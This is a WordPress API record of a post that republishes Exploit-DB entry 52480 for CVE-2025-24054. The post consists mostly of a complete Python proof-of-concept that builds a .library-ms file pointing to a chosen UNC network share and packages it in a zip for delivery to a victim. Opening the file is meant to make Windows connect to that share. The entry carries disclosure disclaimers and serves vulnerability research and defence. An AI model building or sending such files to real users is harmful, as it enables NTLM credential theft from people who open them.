{"id":40345,"date":"2026-02-11T05:41:34","date_gmt":"2026-02-11T05:41:34","guid":{"rendered":"http:\/\/localhost\/?p=40345"},"modified":"2026-02-11T05:41:34","modified_gmt":"2026-02-11T05:41:34","slug":"windows-100177637009-spoofing-vulnerability","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40345","title":{"rendered":"Windows 10.0.17763.7009 &#8211; spoofing vulnerability_EDB-ID:52480"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-11T11:28:26&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Windows 10.0.17763.7009 &#8211; spoofing vulnerability Google Dork: N\/A Date: 2025-10-06 Exploit Author: Beatriz Fresno Naumova Vendor Homepage: https:\/\/www.microsoft.com Software Link: N\/A Version: Not applicable this is a generic Windows&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;Windows 10.0.17763.7009 &#8211; spoofing vulnerability&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52480&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-24054&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Windows 10.0.17763.7009 &#8211; spoofing vulnerability\\r\\n# Google Dork: N\/A\\r\\n# Date: 2025-10-06\\r\\n# Exploit Author: Beatriz Fresno Naumova\\r\\n# Vendor Homepage: https:\/\/www.microsoft.com\\r\\n# Software Link: N\/A\\r\\n# Version: Not applicable (this is a generic Windows library file behavior)\\r\\n# Tested on: Windows 10 (x64) \/ Windows 11 (x64) (lab environment)\\r\\n# CVE: CVE-2025-24054\\r\\n#\\r\\n# Description:\\r\\n# A proof-of-concept that generates a .library-ms XML file pointing to a network\\r\\n# share (UNC). When opened\/imported on Windows, the library points to the specified\\r\\n# UNC path.\\r\\n#\\r\\n# Notes:\\r\\n# &#8211; This PoC is provided for responsible disclosure only. Do not test against\\r\\n#   live\/production websites or networks without explicit written permission.\\r\\n# &#8211; Attach exactly one exploit file per email (this file).\\r\\n# &#8211; Include the .library-ms (or ZIP containing it) as an attachment, plus this header block.\\r\\n\\r\\n#!\/usr\/bin\/env python3\\r\\n\\r\\nimport argparse\\r\\nimport ipaddress\\r\\nimport os\\r\\nimport re\\r\\nimport sys\\r\\nimport tempfile\\r\\nimport zipfile\\r\\nimport shutil\\r\\nfrom pathlib import Path\\r\\n\\r\\n# Very small hostname check (keeps things simple)\\r\\n_HOSTNAME_RE = re.compile(\\r\\n    r\\&#8221;^(?:[A-Za-z0-9](?:[A-Za-z0-9\\\\-]{0,61}[A-Za-z0-9])?\\\\.)*[A-Za-z0-9\\\\-]{1,63}$\\&#8221;\\r\\n)\\r\\n\\r\\n# simple sanitizer: allow only a limited charset for base filenames\\r\\n_FILENAME_RE = re.compile(r\\&#8221;^[A-Za-z0-9._-]{1,128}$\\&#8221;)\\r\\n\\r\\n\\r\\ndef is_valid_target(value: str) -\\u003e bool:\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    Return True if value looks like an IP address, a hostname, or a UNC path.\\r\\n    This is intentionally permissive \u2014 it&#8217;s only to catch obvious typos.\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    if value.startswith(\\&#8221;\\\\\\\\\\\\\\\\\\&#8221;) or value.startswith(\\&#8221;\/\/\\&#8221;):\\r\\n        # Minimal UNC sanity: ensure there&#8217;s at least \\\\\\\\host\\\\share (two components)\\r\\n        parts = re.split(r\\&#8221;[\\\\\\\\\/]+\\&#8221;, value.strip(\\&#8221;\\\\\\\\\/\\&#8221;))\\r\\n        return len(parts) \\u003e= 2 and all(parts[:2])\\r\\n    try:\\r\\n        ipaddress.ip_address(value)\\r\\n        return True\\r\\n    except ValueError:\\r\\n        pass\\r\\n    if _HOSTNAME_RE.match(value):\\r\\n        return True\\r\\n    return False\\r\\n\\r\\n\\r\\ndef build_library_xml(target: str) -\\u003e str:\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    Build the XML content for the .library-ms file.\\r\\n    If the user supplies a bare host\/IP, the script uses a share called &#8216;shared&#8217;\\r\\n    (matching the original behavior).\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    if target.startswith(\\&#8221;\\\\\\\\\\\\\\\\\\&#8221;) or target.startswith(\\&#8221;\/\/\\&#8221;):\\r\\n        # normalize forward slashes to backslashes (if any)\\r\\n        url = target.replace(\\&#8221;\/\\&#8221;, \\&#8221;\\\\\\\\\\&#8221;)\\r\\n    else:\\r\\n        url = f\\&#8221;\\\\\\\\\\\\\\\\{target}\\\\\\\\shared\\&#8221;\\r\\n    # Return a plain, minimal XML structure (no additional payloads)\\r\\n    return f\\&#8221;\\&#8221;\\&#8221;\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221;?\\u003e\\r\\n\\u003clibraryDescription xmlns=\\&#8221;http:\/\/schemas.microsoft.com\/windows\/2009\/library\\&#8221;\\u003e\\r\\n  \\u003csearchConnectorDescriptionList\\u003e\\r\\n    \\u003csearchConnectorDescription\\u003e\\r\\n      \\u003csimpleLocation\\u003e\\r\\n        \\u003curl\\u003e{url}\\u003c\/url\\u003e\\r\\n      \\u003c\/simpleLocation\\u003e\\r\\n    \\u003c\/searchConnectorDescription\\u003e\\r\\n  \\u003c\/searchConnectorDescriptionList\\u003e\\r\\n\\u003c\/libraryDescription\\u003e\\r\\n\\&#8221;\\&#8221;\\&#8221;\\r\\n\\r\\n\\r\\ndef write_zip_with_lib(xml_content: str, lib_name: str, zip_path: Path) -\\u003e None:\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    Write the XML to a temporary .library-ms file and add it into a zip.\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    tmpdir = Path(tempfile.mkdtemp(prefix=\\&#8221;libgen_\\&#8221;))\\r\\n    try:\\r\\n        tmp_lib = tmpdir \/ lib_name\\r\\n        tmp_lib.write_text(xml_content, encoding=\\&#8221;utf-8\\&#8221;)\\r\\n        with zipfile.ZipFile(zip_path, mode=\\&#8221;w\\&#8221;, compression=zipfile.ZIP_DEFLATED) as zf:\\r\\n            # place the file at the root of the zip\\r\\n            zf.write(tmp_lib, arcname=lib_name)\\r\\n    finally:\\r\\n        # robust cleanup\\r\\n        try:\\r\\n            shutil.rmtree(tmpdir)\\r\\n        except Exception:\\r\\n            pass\\r\\n\\r\\n\\r\\ndef sanitize_basename(name: str) -\\u003e str:\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    Ensure the provided base filename is a short safe token (no path separators).\\r\\n    Raises ValueError on invalid names.\\r\\n    \\&#8221;\\&#8221;\\&#8221;\\r\\n    if not name:\\r\\n        raise ValueError(\\&#8221;Empty filename\\&#8221;)\\r\\n    if os.path.sep in name or (os.path.altsep and os.path.altsep in name):\\r\\n        raise ValueError(\\&#8221;Filename must not contain path separators\\&#8221;)\\r\\n    if not _FILENAME_RE.match(name):\\r\\n        raise ValueError(\\r\\n            \\&#8221;Filename contains invalid characters. Allowed: letters, numbers, dot, underscore, hyphen\\&#8221;\\r\\n        )\\r\\n    return name\\r\\n\\r\\n\\r\\ndef main():\\r\\n    parser = argparse.ArgumentParser(\\r\\n        description=\\&#8221;Generate a .library-ms inside a zip (keep it responsible).\\&#8221;\\r\\n    )\\r\\n    parser.add_argument(\\r\\n        \\&#8221;&#8211;file\\&#8221;,\\r\\n        \\&#8221;-f\\&#8221;,\\r\\n        default=None,\\r\\n        help=\\&#8221;Base filename (without extension). If omitted, interactive prompt is used.\\&#8221;,\\r\\n    )\\r\\n    parser.add_argument(\\r\\n        \\&#8221;&#8211;target\\&#8221;,\\r\\n        \\&#8221;-t\\&#8221;,\\r\\n        default=None,\\r\\n        help=\\&#8221;Target IP, hostname or UNC (e.g. 192.168.1.162 or \\\\\\\\\\\\\\\\host\\\\\\\\share).\\&#8221;,\\r\\n    )\\r\\n    parser.add_argument(\\r\\n        \\&#8221;&#8211;zip\\&#8221;,\\r\\n        \\&#8221;-z\\&#8221;,\\r\\n        default=\\&#8221;exploit.zip\\&#8221;,\\r\\n        help=\\&#8221;Output zip filename (default: exploit.zip).\\&#8221;,\\r\\n    )\\r\\n    parser.add_argument(\\r\\n        \\&#8221;&#8211;out\\&#8221;,\\r\\n        \\&#8221;-o\\&#8221;,\\r\\n        default=\\&#8221;.\\&#8221;,\\r\\n        help=\\&#8221;Output directory (default: current directory).\\&#8221;,\\r\\n    )\\r\\n    parser.add_argument(\\r\\n        \\&#8221;&#8211;dry-run\\&#8221;,\\r\\n        action=\\&#8221;store_true\\&#8221;,\\r\\n        help=\\&#8221;Print the .library-ms content and exit without creating files.\\&#8221;,\\r\\n    )\\r\\n    parser.add_argument(\\r\\n        \\&#8221;&#8211;force\\&#8221;,\\r\\n        action=\\&#8221;store_true\\&#8221;,\\r\\n        help=\\&#8221;Overwrite output zip if it already exists (use with care).\\&#8221;,\\r\\n    )\\r\\n    args = parser.parse_args()\\r\\n\\r\\n    # Interactive fallback if needed\\r\\n    if not args.file:\\r\\n        try:\\r\\n            args.file = input(\\&#8221;Enter your file name (base, without extension): \\&#8221;).strip()\\r\\n        except EOFError:\\r\\n            print(\\&#8221;No file name provided.\\&#8221;, file=sys.stderr)\\r\\n            sys.exit(1)\\r\\n    if not args.target:\\r\\n        try:\\r\\n            args.target = input(\\r\\n                \\&#8221;Enter IP or host (e.g. 192.168.1.162 or \\\\\\\\\\\\\\\\host\\\\\\\\share): \\&#8221;\\r\\n            ).strip()\\r\\n        except EOFError:\\r\\n            print(\\&#8221;No target provided.\\&#8221;, file=sys.stderr)\\r\\n            sys.exit(1)\\r\\n\\r\\n    # sanitize filename\\r\\n    try:\\r\\n        safe_base = sanitize_basename(args.file)\\r\\n    except ValueError as e:\\r\\n        print(f\\&#8221;ERROR: invalid file name: {e}\\&#8221;, file=sys.stderr)\\r\\n        sys.exit(2)\\r\\n\\r\\n    if not args.target or not is_valid_target(args.target):\\r\\n        print(\\r\\n            \\&#8221;ERROR: target does not look like a valid IP, hostname, or UNC path.\\&#8221;,\\r\\n            file=sys.stderr,\\r\\n        )\\r\\n        sys.exit(2)\\r\\n\\r\\n    lib_filename = f\\&#8221;{safe_base}.library-ms\\&#8221;\\r\\n    xml = build_library_xml(args.target)\\r\\n\\r\\n    # Dry-run: show the content and exit\\r\\n    if args.dry_run:\\r\\n        print(\\&#8221;=== DRY RUN: .library-ms content ===\\&#8221;)\\r\\n        print(xml)\\r\\n        print(\\&#8221;=== END ===\\&#8221;)\\r\\n        print(f\\&#8221;(Would create {lib_filename} inside {args.zip} in {args.out})\\&#8221;)\\r\\n        return\\r\\n\\r\\n    out_dir = Path(args.out).resolve()\\r\\n    out_dir.mkdir(parents=True, exist_ok=True)\\r\\n    zip_path = out_dir \/ args.zip\\r\\n\\r\\n    if zip_path.exists() and not args.force:\\r\\n        print(\\r\\n            f\\&#8221;ERROR: {zip_path} already exists. Use &#8211;force to overwrite.\\&#8221;,\\r\\n            file=sys.stderr,\\r\\n        )\\r\\n        sys.exit(3)\\r\\n\\r\\n    # small reminder about authorization\\r\\n    print(\\&#8221;Reminder: run tests only against systems you are authorized to test.\\&#8221;)\\r\\n    write_zip_with_lib(xml, lib_filename, zip_path)\\r\\n    print(f\\&#8221;Done. Created {zip_path} containing {lib_filename} -\\u003e points to {args.target}\\&#8221;)\\r\\n\\r\\n\\r\\nif __name__ == \\&#8221;__main__\\&#8221;:\\r\\n    main()&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52480&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:6.5,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52480&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-11T11:28:26&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Windows 10.0.17763.7009 &#8211; spoofing vulnerability Google Dork: N\/A Date: 2025-10-06 Exploit Author: Beatriz Fresno Naumova Vendor Homepage: https:\/\/www.microsoft.com Software Link: N\/A Version: Not&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,40,21,13,7,11,5],"class_list":["post-40345","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Windows 10.0.17763.7009 - spoofing vulnerability_EDB-ID:52480 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40345\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Windows 10.0.17763.7009 - spoofing vulnerability_EDB-ID:52480 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-11T11:28:26&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Windows 10.0.17763.7009 &#8211; spoofing vulnerability Google Dork: N\/A Date: 2025-10-06 Exploit Author: Beatriz Fresno Naumova Vendor Homepage: https:\/\/www.microsoft.com Software Link: N\/A Version: Not...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40345\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-11T05:41:34+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40345#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40345\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Windows 10.0.17763.7009 &#8211; spoofing vulnerability_EDB-ID:52480\",\"datePublished\":\"2026-02-11T05:41:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40345\"},\"wordCount\":1522,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.5\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40345#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40345\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40345\",\"name\":\"Windows 10.0.17763.7009 - spoofing vulnerability_EDB-ID:52480 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-11T05:41:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40345#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40345\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40345#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Windows 10.0.17763.7009 &#8211; spoofing vulnerability_EDB-ID:52480\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Windows 10.0.17763.7009 - spoofing vulnerability_EDB-ID:52480 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40345","og_locale":"en_US","og_type":"article","og_title":"Windows 10.0.17763.7009 - spoofing vulnerability_EDB-ID:52480 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-11T11:28:26&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Windows 10.0.17763.7009 &#8211; spoofing vulnerability Google Dork: N\/A Date: 2025-10-06 Exploit Author: Beatriz Fresno Naumova Vendor Homepage: https:\/\/www.microsoft.com Software Link: N\/A Version: Not...","og_url":"https:\/\/zero.redgem.net\/?p=40345","og_site_name":"zero redgem","article_published_time":"2026-02-11T05:41:34+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40345#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40345"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Windows 10.0.17763.7009 &#8211; spoofing vulnerability_EDB-ID:52480","datePublished":"2026-02-11T05:41:34+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40345"},"wordCount":1522,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.5","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40345#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40345","url":"https:\/\/zero.redgem.net\/?p=40345","name":"Windows 10.0.17763.7009 - spoofing vulnerability_EDB-ID:52480 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-11T05:41:34+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40345#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40345"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40345#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Windows 10.0.17763.7009 &#8211; spoofing vulnerability_EDB-ID:52480"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40345"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40345\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}